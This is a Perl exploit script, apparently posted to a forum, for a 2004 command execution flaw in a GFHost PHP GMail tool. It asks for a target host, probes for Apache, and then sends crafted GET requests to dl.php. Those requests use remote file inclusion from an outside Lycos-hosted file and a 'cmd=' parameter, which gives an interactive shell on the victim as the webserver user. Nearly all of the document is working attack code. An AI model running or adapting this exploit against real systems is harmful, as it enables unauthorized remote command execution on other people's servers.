##############################################

# GFHost explo

# Spawn bash style Shell with webserver uid

# Greetz SPAX, foxtwo, Zone-H

# This Script is currently under development

##############################################

use strict;

use IO::Socket;

my $host;

my $port;

my $command;

my $url;

my @results;

my $probe;

my @U;

$U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=http://utenti.lycos.it/z00/xpl
.gif&cmd=";

&intro;

&scan;

&choose;

&command;

&exit;

sub intro {

&help;

&host;

&server;

sleep 1;

};

sub host {

print "\nHost or IP : ";

$host=<STDIN>;

chomp $host;

if ($host eq ""){$host="127.0.0.1"};

print "\nPort (enter to accept 80): ";

$port=<STDIN>;

chomp $port;

if ($port =~/\D/ ){$port="80"};

if ($port eq "" ) {$port = "80"};

};

sub server {

my $X;

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

$probe = "string";

my $output;

my $webserver = "something";

&connect;

for ($X=0; $X<=10; $X++){

$output = $results[$X];

if (defined $output){

if ($output =~/apache/){ $webserver = "apache" };

};

};

if ($webserver ne "apache"){

my $choice = "y";

chomp $choice;

if ($choice =~/N/i) {&exit};

}else{

print "\n\nOK";

};

};

sub scan {

my $status = "not_vulnerable";

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

my $loop;

my $output;

my $flag;

$command="dir";

for ($loop=1; $loop < @U; $loop++) {

$flag = "0";

$url = $U[$loop];

$probe = "scan";

&connect;

foreach $output (@results){

if ($output =~ /Directory/) {

$flag = "1";

$status = "vulnerable";

};

};

if ($flag eq "0") {

}else{

};

};

if ($status eq "not_vulnerable"){

};

};

sub choose {

my $choice="1";

chomp $choice;

if ($choice > @U){ &choose };

if ($choice =~/\D/g ){ &choose };

if ($choice == 0){ &other };

$url = $U[$choice];

};

sub other {

my $other = <STDIN>;

chomp $other;

$U[0] = $other;

};

sub command {

while ($command !~/quit/i) {

print "[$host]\$ ";

$command = <STDIN>;

chomp $command;

if ($command =~/quit/i) { &exit };

if ($command =~/url/i) { &choose };

if ($command =~/scan/i) { &scan };

if ($command =~/help/i) { &help };

$command =~ s/\s/+/g;

$probe = "command";

if ($command !~/quit|url|scan|help/) {&connect};

};

&exit;

};

sub connect {

my $connection = IO::Socket::INET->new (

Proto => "tcp",

PeerAddr => "$host",

PeerPort => "$port",

) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";

$connection -> autoflush(1);

if ($probe =~/command|scan/){

print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";

}elsif ($probe =~/string/) {

print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";

};

while ( <$connection> ) {

@results = <$connection>;

};

close $connection;

if ($probe eq "command"){ &output };

if ($probe eq "string"){ &output };

};

sub output{

my $display;

if ($probe eq "string") {

my $X;

for ($X=0; $X<=10; $X++) {

$display = $results[$X];

if (defined $display){print "$display";};

};

}else{

foreach $display (@results){

print "$display";

};

};

};

sub exit{

print "\n\n\n ORP";

exit;

};

sub help {

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

print "\n

GFHost PHP GMail

Command Execution Vulnerability by SPABAM 2004" ;

print "\n http://www.zone-h.org/advisories/read/id=4904

";

print "\n GFHost.pl Exploit v1.1";

print "\n \n note.. Script under DEVEL";

print "\n";

print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";

print "\n Command: SCAN URL HELP QUIT";

print "\n\n\n\n\n\n\n\n\n\n\n";

};

[ reply ]